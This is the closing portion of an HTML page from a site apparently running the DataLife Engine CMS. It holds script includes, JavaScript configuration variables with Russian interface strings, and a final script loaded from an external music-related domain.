<script src="/engine/classes/js/jqueryui.js?v=24" defer></script>
<script src="/engine/classes/js/dle_js.js?v=24" defer></script>
<script src="/templates/up/js/libs.js"></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '228bd5b29e78807405279651fedcef0a47d56e63';
var dle_group      = 5;
var dle_skin       = 'up';
var dle_wysiwyg    = '1';
var quick_wysiwyg  = '1';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
jQuery(function($){
FastSearch();
});
//-->
</script>

<script src='https://get-mus.xyz/muzup.js?u=115' defer></script>    
</body>
</html>